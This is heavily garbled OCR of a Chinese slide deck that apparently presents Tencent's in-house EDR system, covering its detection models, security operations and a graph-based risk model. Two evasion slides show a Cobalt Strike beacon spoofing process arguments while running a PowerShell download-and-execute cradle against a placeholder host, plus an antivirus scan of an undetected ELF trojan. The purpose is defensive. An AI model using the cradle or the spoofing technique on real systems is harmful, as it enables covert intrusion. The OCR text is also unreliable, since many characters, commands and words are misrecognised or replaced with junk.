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EDR 修 绍 


EDR (Endpoint Detection and Response) ， 由 Gartner 在 2013 年 提出 ， 
起 初 叫 ETDR，2015 年 改 为 EDR。 


。E- 疹 点 : 网 络 中 任意 的 终端 设备 ， 包 括 办 公 PC、 
移动 设备 、 服 务 器 设备 、 云 上 虚拟 机 、loT 设 备 等 
。D- 检 测 : 采集 分 析 端 点 数据 ， 发 现 端点 安全 风险 、 

检测 黑客 攻击 、 检 测 可 蜂 行 为 等 
“ R- 啊 应 : 安全 风险 快速 响应 ， 包 括 漏洞 修复 、 入 
侵 阻 断 追 湖 、 可 疑 事件 调查 等 
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企业 的 ”绝境 长 城 ”& 守卫 者 
EDR 连续 三 年 (2016-2018) 被 
Gartner 评 为 10 大 安全 技术 /项 目 
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EDR 行 业 热 点 


机 器 学 习 / 人 工 智能 


APT 检 测 日 名 单 
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腾讯 自 研 EDR - 洋葱 


融合 腾讯 自身 十 几 年 生产 网 络 攻防 经 验 ， 管 、 控 、 审 于 一 体 


终端 资产 一 体 化 管理 


针对 服务 器 安全 检测 能 力 ， 并 实现 了 对 
全 网 服务 器 端点 资产 的 全 面 管控 。 


漏洞 风险 的 实时 预警 


结合 自身 服务 器 防护 经 验 ， 针 对 服务 器 
中 间 件 、 数 据 库 、 操 作 系统 提供 漏洞 检 
端点 安全 的 基线 检测 测 能 力 ， 实 时 监测 发 现 漏洞 风险 。 
依据 腾讯 自身 业务 防护 实践 ， 提 供 了 端口 
配置 、 口 令 配置 、 账 号 配置 的 基线 检测 | 
可 实现 企业 面临 安全 威胁 的 实时 检测 |。 


入 侵 攻击 的 主动 检测 


提供 主动 检测 、 实 时 发 现 入 侵 检测 ; 提 
供 Web 木 马 、 反 弹 木 马 、 异 常 网 络 通 、 
提 权 攻击 、 弱 口令 等 检测 功能 。 
安全 事件 的 精准 溯源 

通过 对 服务 器 端的 登录 信息 、 操 作 信息 ， 
建立 行为 分 析 模 型 ， 实 现 对 异常 操作 进 
行 异 常 操作 湖 源 分 析 。 
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系统 建设 难 操 


级 训 占 宏和 记 记 香 如 立 自 研 Agent, 文 持 Linux/win， 支持 


自 点 资源 限制 


容器 Agentless 部 署 


实时 指标 监控 、 模 拟 拨 测 


海量 数据 实时 分 析 自 研 过 滤器 、 分 析 引擎 
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系统 匀 构 
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检 测 模型 


评价 指标 


。 基于 cyber kill chain 
。 基于 外 部 攻击 案例 
。 基于 内 部 红 效 演练 


。 专家 知识 。 机 器 学 习 
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误 报 反馈 


Client 端 
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性 测 与 运营 


安全 工 单 要 做 分 类 分 级 
高 风险 7*24 小 时 专人 值班 
v 策略 误 报 高 要 降级 


安全 专家 
运营 应 急 


安全 专家 
运营 应 急 


跟 进 & 詹 化 


实名 用 户 


异常 操作 本 二 副 
村 二 二 


ea 用 户 确认 


非 正常 操作 


7*24 小 时 
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03 - 对 折 与 提升 


对 话 ' 交流 * 合作 。 前 沿 “ 实 用- 人 才 


GE 
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举例 1: 进程 参数 欺 


.pa mu xc mcuu 盯 rruceaa oa 
beacon> help argue :5. . ， 因 conhost. exe 3332 廊 Process Start 

cmd. eze 2504 留 Process Start 
Use: argue [command] [fake arguments] 古 sa 3556 Process start 


argue [command] DOWwetshel1. exe 3872 沽 &Process Start 


argUe 2 Ac 2 导 


Event | Process | Stack | 


Spoof [fake arguments] for [command] processes launched by Beacon- 
Date; 2019111!28 14;55;21,3719021 


Thread; 4776 


Class' Process 
Use argue [command] to disable this feature for the specified command- Operation' Process Start 


This option does not affect runuyspawmu。，Trunasyrspawmas。， or post-ex jobs- 


Result; SUCCE55 
Use argue by itself to list programs with defined spoofed arguments- Path: 

beacony> 有 argue DOWeTShe1]1 其 其 其 其 其 其 其 式 其 其 其 其 其 式 其 其 其 其 3 肝 其 其 其 忒 其 其 其 也 其 其 式 其 其 其 基 其 其 其 其 其 其 其 其 其 其 其 其 其 其 其 其 其 其 区 其 其 其 其 其 其 区 其 其 其 其 其 区 区 其次 区 其 其 区 其 其 区 全 其 科 Duration' 0.0000000 

[] Tasked beacon to spoof ”powershel1l” as ” 

区 Parent PID; 3000 

beacon> run powezrshel1 “IEX (Newr0Object Net-WebCclient)-DowmloadString (http:yrx.comyx-ps” ) : Command line; powershell xxXXXXXXXXXXXXXXXXXXXXXXXXX 


[#] Tasked beacon to run: powershel1 “IE (Newr0Object Net-yWebClient).DowmloadString (http:yrx.comrx.-ps” )”: Cr 区 


Before: powershell "IEX (New-Object Net.Webclient).Downloadstring(http://Xx.com/Xx.ps ) 
After  : Powershell XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 
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EDR 红 过 


(OO No engines detected this file 


bc7f889972cc10129aa6ff748842f89bafb7459cc78cbd3efbda9244d90f9690 
cshell 


一 64bits elf 
举例 2: 兔 杀 木马 四 
: 锡 示 不 三 
DETECTION DETAILS BEHAVIOR COMMUNITY 

Ad-Aware (GO Undetected AegisLab 
AhnLab-V3 人 GO Undetected ALYac 
Arcabft (OO Undetected Avast 
AvastMobile 人 GO Undetected AVG 
Avira (no cloud) 人 Undetectied Baidu 
BitDefender 人 Undetected BitDefenderTheta 
Bkav (OO Undetected CAT-QuickHeal 
ClamAV 人 Undetected CMC 
Comodo (GO Undetected Cyren 
DrWeb (GO Undetected Emsisoft 
eScan (OO Undetected ESET-NOD32 
F-Prot 人 Undetected F-Secure 
FireEye (OO Undetected Forinet 


GData (GO Undetected lkarus 
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辐 模型 


效 据 天 联 ， 构 建安 全 事件 图 谐 ， 友 现 隐 胡 攻 击 行 为 


红 蓝 以 攻 促 防 ， 扩 充 样 本 
旬 光 四 导读 莫 咽 


是 高 策略 友 代 效率 


提升 数据 丰富 度 
IDS,RASPCMDB 等 
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方案 说 明 


氮 / 边 连接 将 事件 聚合 成 图 ， 操 

user root 为 对 象 ， 如 用 户 名 、 IP、 域名 
加 ) 一 区 罗 " 等 ; 边 为 行为 ， 如 登录 、 操 作 、 
下 PH 泡 域名 访问 等 


w 边 行为 做 风险 排序 ， 设 置 权重 ， 


高 风险 高 之 标注 


告警 算法 : 模式 匹配 +rank 排 序 ， 
误 报 低 ， 泛 化 能 力 待 加强 
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效 据 源 > 分析 引 擎 > ”风险 识别 
终端 数据 


EDR_RASP_SEIM 构建 图 
Risk Model | 


基础 数据 Risk Rank 


寻找 异常 子 图 


CMDB 员工 信息 .………. 全 一 Sample Replay ] 
网 络 数 据 ee 工 单 报警 


IDS 网 关 日 志 Risk Event 


1、 平 台 决 定 效 率 


2、 样 本 决定 效果 
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